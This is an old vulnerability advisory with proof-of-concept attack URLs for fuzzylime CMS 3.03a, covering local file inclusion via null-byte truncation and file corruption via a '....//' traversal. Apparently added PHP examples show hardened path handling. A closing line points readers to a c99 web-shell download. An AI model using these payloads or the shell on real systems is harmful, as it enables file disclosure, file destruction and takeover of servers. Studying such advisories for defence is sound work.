SECURITYVULNS:DOC:22065
Jun 22, 2009 - 12:00 a.m.

fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC

vulners.com

+------------------------------------------------------------------------+
| fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc |
+----------+-------------------------------------------------------------+
| by staker |
+----------+---------------------+
Author : xhaxkerx
Special Thankz : yasin
site : http://www.c99.mobi
+--------------------------------+

[1][LFI]

http://[target]/[path]/code/confirm.php?e[]&list={file + nullbyte}

Vulnerable code: confirm.php (local file inclusion, magic_quotes_gpc=off)

  <?
  @extract($HTTP_GET_VARS);                          <-------- {1}
  @extract($_GET);                                   <----------^
  elseif(isset($e)) {                                <------- {2}
      $filename = "code/mailing/$list.inc.php";      <------- {3}
      @include $filename;                            <------- {4}
    

  1. extract() imports every GET parameter as a local variable (and with its
     default EXTR_OVERWRITE flag it also overwrites variables that already
     exist), so the script behaves as if register_globals were on whatever
     php.ini says.

  2. $e is never set by the script, so $_GET['e'] becomes $e. Passing e[] in
     the URL makes $e an empty array, which is enough for isset($e) to be true
     and the elseif branch to be taken.

  3. $list is never set by the script either, so $_GET['list'] becomes $list.

  4. $filename is built from $list and handed to include. With
     magic_quotes_gpc=off the null byte is not escaped, so a %00 at the end of
     list truncates the path and the ".inc.php" suffix is never seen by the
     filesystem. (This only holds for the PHP builds of the time: PHP rejects
     paths containing a null byte since 5.3.4, and magic_quotes_gpc and
     register_globals were removed in 5.4.)


[2][LFI]

http://[target]/[path]/code/display.php?template={file + nullbyte}

Vulnerable code: display.php (local file inclusion, magic_quotes_gpc=off and register_globals=on)

  if($_GET['print'] != "1") include "templates/${template}_f.php";

$template is never initialised by the script, so with register_globals=on it
is taken straight from the query string; the null byte again drops the
"_f.php" suffix.
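The include pattern from [1] and [2] next to a hardened version, as an added example written for this page (it is not fuzzylime code; the function names, the allowlist regex and the temporary directory used for the self-check are assumptions). The vulnerable function keeps the shape of the original: the request parameter becomes a local variable and is concatenated into the include path, so on the PHP builds of the time a trailing null byte cut off the fixed suffix. The hardened function does not extract() anything, accepts only a short alphanumeric name, and confirms with realpath() that the resolved file lives inside the mailing directory.

```php
<?php
// Added example, not fuzzylime code. Names, the allowlist and the
// temp-directory self-check below are assumptions for this illustration.

// Vulnerable shape from [1]/[2]: the include path is built from an
// unvalidated GET parameter that extract() turned into a local variable.
// On PHP < 5.3.4 with magic_quotes_gpc=off, a "\0" at the end of $list
// truncated the path so ".inc.php" (or "_f.php" in [2]) was never applied.
function vulnerable_mailing_path(array $get): string
{
    extract($get);                        // $list arrives straight from the query string
    return "code/mailing/$list.inc.php";
}

// Hardened shape: no extract(), a strict allowlist on the name, and a
// realpath() containment check. The regex uses \z rather than $ so a
// trailing newline cannot slip past it; realpath() catches anything the
// regex author did not anticipate (symlinks, odd encodings).
function safe_mailing_path(array $get, string $base): ?string
{
    $list = $get['list'] ?? '';
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\z/', $list)) {
        return null;                      // rejects "../", "\0", "%00", empty names
    }
    $baseReal = realpath($base);
    $target   = realpath("$base/$list.inc.php");
    if ($baseReal === false || $target === false) {
        return null;                      // missing file or bogus base directory
    }
    if (strncmp($target, $baseReal . DIRECTORY_SEPARATOR, strlen($baseReal) + 1) !== 0) {
        return null;                      // resolved outside the mailing directory
    }
    return $target;
}

// Self-check against constructed input; no web server needed.
$tmp = sys_get_temp_dir() . '/mailing_' . getmypid();   // assumed scratch location
mkdir($tmp);
file_put_contents("$tmp/newsletter.inc.php", "<?php echo 'ok';");

// Constructed attacker request: e[] satisfies isset($e), list carries a
// traversal plus a NUL byte. json_encode() makes the NUL visible as \u0000.
$attack = ['e' => [''], 'list' => "../../../../etc/passwd\0"];
echo "vulnerable path: ", json_encode(vulnerable_mailing_path($attack)), "\n";
echo "hardened, attack input: ";
var_dump(safe_mailing_path($attack, $tmp));
echo "hardened, legitimate input matches the real file: ";
var_dump(safe_mailing_path(['list' => 'newsletter'], $tmp) === realpath("$tmp/newsletter.inc.php"));

unlink("$tmp/newsletter.inc.php");
rmdir($tmp);
```

Run it with the php CLI; it creates and removes one file under the system temp directory. The attack input is refused by the regex before any filesystem call is made, and on any PHP from 5.3.4 onward the include itself would already refuse a path containing a null byte, so the hardening is about the traversal and about not trusting extract()ed names at all.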

[3][LFC]

http://[target]/[path]/code/display.php?usecache=1&s=....//settings
http://[target]/[path]/code/display.php?usecache=1&s={file + nullbyte}   (magic_quotes_gpc=off)

Vulnerable code: display.php (local file corruption, register_globals=on)

  <?
  $s = $_GET[s];
  $p = $_GET[p];
  $s = str_replace("../", "", $s);                                                          <---------- {1}
  $p = str_replace("../", "", $p);
  $cachefile = "cache/${s}${p}$_GET[m]$_GET[c]$_GET[t]$_GET[u]$_GET[print].cache.htm";        <---- {2}
  if($usecache == "1" && $passprot != "1" && $s != "rss" && empty($_GET[msg]) && empty($_GET[tn])) {   <--- {3}
      if($handle = fopen($cachefile, 'w')) { // Create the cache file                       <-------- {4}
          $output = ob_get_contents();
          fputs($handle, $output);
          fclose($handle);
      }
  }

  1. str_replace() removes "../" in a single pass and does not re-scan the
     result, so "....//" loses the "../" in its middle and what is left is
     "../". One "....//" per directory level you want to climb.
  2. $cachefile is built from $s (and $p), so the traversal ends up in the
     path that is opened.
  3. $usecache comes from register_globals: usecache=1 in the URL enters the
     branch, provided $passprot is not "1", $s is not "rss" and msg/tn are
     empty.
  4. fopen($cachefile, 'w') truncates whatever file the path points to and the
     buffered page output is written into it, so you corrupt a file of your
     choosing by naming it via $s. With magic_quotes_gpc=off a null byte drops
     the ".cache.htm" suffix; otherwise it stays attached to the name.
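The cache-file write from [3], as an added example for this page (not fuzzylime code; the function names, the allowlist and the use of the system temp directory are assumptions). It pushes the author's payload through the single-pass str_replace() so the surviving "../" can be seen, contrasts that with a loop that strips until nothing changes (which closes this particular bypass but is still a blacklist), and ends with the form a reviewer would want: the parameters are treated as names rather than paths, and the final file is checked to sit directly in the cache directory.

```php
<?php
// Added example, not fuzzylime code. Function names, the allowlist regex and
// the temp directory used below are assumptions for this illustration.

// Vulnerable shape from [3]: one non-recursive str_replace() of "../".
// "....//" contains "../" starting at its third character; removing it
// leaves "../", so the traversal survives the filter.
function vulnerable_cache_path(array $get): string
{
    $s = str_replace('../', '', $get['s'] ?? '');
    $p = str_replace('../', '', $get['p'] ?? '');
    return "cache/{$s}{$p}.cache.htm";
}

// Stripping until the string stops changing defeats "....//", but it is
// still a blacklist: "..\\" on Windows, absolute paths and NUL bytes are
// untouched. Shown only for contrast with the real fix below.
function strip_until_stable(string $s): string
{
    do {
        $before = $s;
        $s = str_replace('../', '', $s);
    } while ($s !== $before);
    return $s;
}

// Hardened shape: $s and $p are names, not paths. Anything outside a short
// alphanumeric token is refused, so there is nothing to strip and no second
// pass to bypass. The dirname() check is defence in depth: the candidate
// file must live directly in the resolved cache directory.
function safe_cache_path(array $get, string $cacheDir): ?string
{
    $s = $get['s'] ?? '';
    $p = $get['p'] ?? '';
    foreach ([$s, $p] as $part) {
        if (!preg_match('/^[A-Za-z0-9_-]{0,64}\z/', $part)) {
            return null;                  // traversal, separators, NUL, oversized
        }
    }
    $dir = realpath($cacheDir);
    if ($dir === false) {
        return null;                      // cache directory does not exist
    }
    $file = "$dir/{$s}{$p}.cache.htm";
    if (dirname($file) !== $dir) {
        return null;                      // would land outside the cache directory
    }
    return $file;
}

// Constructed requests: the advisory's payload, a NUL-byte variant, and a
// legitimate page name. The "\0" is shown via json_encode() as \u0000.
$traversal = ['usecache' => '1', 's' => '....//settings'];
$nulbyte   = ['usecache' => '1', 's' => "....//....//index.php\0"];
$legit     = ['usecache' => '1', 's' => 'home', 'p' => '1'];

echo "single-pass filter, traversal payload: ", vulnerable_cache_path($traversal), "\n";
echo "single-pass filter, NUL payload:       ", json_encode(vulnerable_cache_path($nulbyte)), "\n";
echo "strip-until-stable on the same input:  ", strip_until_stable($traversal['s']), "\n";
echo "hardened, traversal payload: ";
var_dump(safe_cache_path($traversal, sys_get_temp_dir()));
echo "hardened, NUL payload: ";
var_dump(safe_cache_path($nulbyte, sys_get_temp_dir()));
echo "hardened, legitimate request: ";
var_dump(safe_cache_path($legit, sys_get_temp_dir()));
```

Run with the php CLI; nothing is written to disk, the script only computes the paths that fopen() would have received. The first echo still contains "../" after the filter, which is the whole bug; the hardened function returns null for both attack inputs and a path directly inside the temp directory for the legitimate one. Note that on PHP 8 fopen() refuses a path containing a null byte outright, so only the traversal variant of [3] carries over to current versions.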

if you need shell http://www.c99.mobi/c99.txt

[x] http://www.youtube.com/watch?v=h3DQmJOkSY0